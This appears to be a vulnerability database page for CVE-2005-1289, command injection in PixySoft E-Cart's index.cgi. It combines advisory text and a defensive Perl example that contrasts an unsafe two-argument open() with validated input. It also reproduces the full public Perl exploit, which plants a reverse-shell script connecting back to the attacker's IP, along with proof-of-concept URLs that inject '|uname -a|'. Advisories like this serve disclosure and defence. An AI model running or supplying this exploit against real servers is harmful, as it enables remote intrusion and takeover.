CVE-2005-1289
CVSS7.5
Published: 2005-05-02 00:00:00
Last revised: 2016-10-17 23:18:36

[Original] index.cgi in E-Cart 2004 1.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) art and possibly (2) cat parameters.


[CNNVD] PixySoft E-Cart Cat Remote Command Execution Vulnerability (CNNVD-200505-222)

index.cgi in E-Cart 2004 1.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) art and/or (2) cat parameters.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1289
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1289
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-222
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111428818425864&w=2
(UNKNOWN)  BUGTRAQ  20050423 E-Cart v1.1 Remote Command Execution
http://securitytracker.com/id?1013780
(UNKNOWN)  SECTRACK  1013780

- Vulnerability information

PixySoft E-Cart Cat Remote Command Execution Vulnerability
High severity; Input validation
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
index.cgi in E-Cart 2004 1.1 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) art and/or (2) cat parameters.

- Advisories and patches

No data available

- Vulnerability information (954)

E-Cart <= 1.1 (index.cgi) Remote Command Execution Exploit (EDBID:954)
cgi webapps
2005-04-25 Verified
0 z
N/A
#!/usr/bin/perl
#
# Example added if code doesn't work for ya:
# http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|
# /str0ke
#
#
# info: emanuele@orvietolug.org
#
use IO::Socket; 

print "\n\n ~~ www.badroot.org ~~ \n\n";
print " E-Cart E-Commerce Software index.cgi\n";
print " Remote Command Execution Vulnerability\n";
print " Affected version: <= E-Cart 2004 v1.1\n";
print " http://www.securityfocus.com/archive/1/396748/2005-04-20/2005-04-26/0  \n\n";
print " ~~ code by z\\ ~~\n\n\n";
print " 04.23.2005\n\n\n";


print "hostname: \n"; 
chomp($server=<STDIN>);  

print "port: (default: 80)\n";
chomp($port=<STDIN>);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );

print "path: (/cgi-bin/ecart/)\n";
chomp($path=<STDIN>);

print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>);

print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>);


print " \n\n";
print "~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\r\n";

print "[*] try to exploiting...\n"; 

$string="/$path/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>cbs.pl;perl cbs.pl $ip $reverse|";

print "[*] OK! \n"; 
print "[*] NOW, run in your box: nc -l -vv -p $reverse\n";
print "[*] starting connect back on $ip :$reverse\n";
print "[*] DONE!\n";
print "[*] Loock netcat windows and funny\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp) 
or die; 


print $socket "POST $path HTTP/1.1\n"; 
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: 7330ecart\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
print " WARNING - WARNING - WARNING - WARNING   \r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\n";
print "If connect back shell not found:\n";
print "- you do not have privileges to write in /tmp\n";
print "- Shell not vulnerable\n\n\n";
print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu us.ircnet.org\n\n\n";


# milw0rm.com [2005-04-25]
		

- Vulnerability information

15738
E-Cart 2004 index.cgi art Parameter Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

E-Cart 2004 contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the 'art' parameter in the 'index.cgi' script not being properly sanitized and may allow a remote attacker to execute arbitrary commands via shell metacharacters resulting in a loss of integrity.

- Timeline

2005-04-23 Unknown
2005-04-23 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

PixySoft E-Cart Art Parameter Remote Command Execution Vulnerability
Input Validation Error 13321
Yes No
2005-04-22 12:00:00 2009-07-12 02:06:00
Discovery is credited to Inaki Cormenzana.

- Affected program versions

PixySoft E-Cart 1.1

- Vulnerability discussion

PixySoft E-Cart is prone to a remote arbitrary command execution vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data.

Specifically, the user-specified 'art' URI parameter is supplied to a Perl open() routine.

PixySoft E-Cart version 1.1 is reported vulnerable to this issue.
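The root cause named above (request data reaching a Perl open() call) is worth seeing side by side with its fix. The following is an added illustration written for this page; it is not E-Cart's code, and the data/<cat>/<art> layout, the function names and the sample inputs are assumptions. The unsafe version uses the two-argument form of open(), where a trailing "|" in the filename turns the call into a piped command; the safe version allow-lists both parameters and uses the three-argument open() with an explicit read mode, so the string can only ever be treated as a filename.

```perl
#!/usr/bin/perl
# Added illustration for CVE-2005-1289, not E-Cart's own code.
# Contrasts a two-arg open() on request data with a validated three-arg open().
use strict;
use warnings;

# Hypothetical layout assumed here: article files live under data/<cat>/<art>.
my $DATA_ROOT = 'data';

# VULNERABLE: two-arg open(). Perl infers the mode from the string itself, so a
# value ending in '|' is executed as a shell command instead of opened as a file.
# Running under `perl -T` would flag this as an insecure dependency in piped open.
sub read_article_unsafe {
    my ($cat, $art) = @_;
    my $path = "$DATA_ROOT/$cat/$art";
    open(my $fh, $path) or return undef;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Allow-list check for one path component: starts with a letter or digit, then
# letters, digits, '_', '-', '.'; bounded length; no '/', no '..', no metacharacters.
sub param_ok {
    my ($value) = @_;
    return 0 unless defined $value;
    return 0 unless $value =~ /\A[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\z/;
    return 0 if $value =~ /\.\./;
    return 1;
}

# FIXED: validate first, then three-arg open with an explicit '<' mode, so the
# path can never be reinterpreted as a pipe or command.
sub read_article_safe {
    my ($cat, $art) = @_;
    return undef unless param_ok($cat) && param_ok($art);
    my $path = "$DATA_ROOT/$cat/$art";
    open(my $fh, '<', $path) or return undef;
    local $/;
    my $body = <$fh>;
    close $fh;
    return $body;
}

# Constructed inputs: a normal article name, a value with a pipe and a space
# (the shape the advisory describes), and a traversal attempt.
my @samples = (
    'reproductordvp-ns315.dat',
    'reproductordvp-ns315.dat|uname -a|',
    '../../etc/passwd',
);
for my $s (@samples) {
    printf "%-40s %s\n", $s, param_ok($s) ? 'accepted' : 'rejected';
}
```

Only the first sample passes param_ok(); the other two are rejected before any open() is reached. Even without the allow-list, the three-argument open() alone removes the command execution, but the validation also stops path traversal and keeps error handling simple.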

- Exploit

An exploit is not required.

The following proof of concept is available:
http://www.example.com/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|

SoulBlack has provided the following exploit:
http://www.soulblack.com.ar/repo/tools/ecart-xpl.php

The following script has been provided that supplies a connect back shell:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References
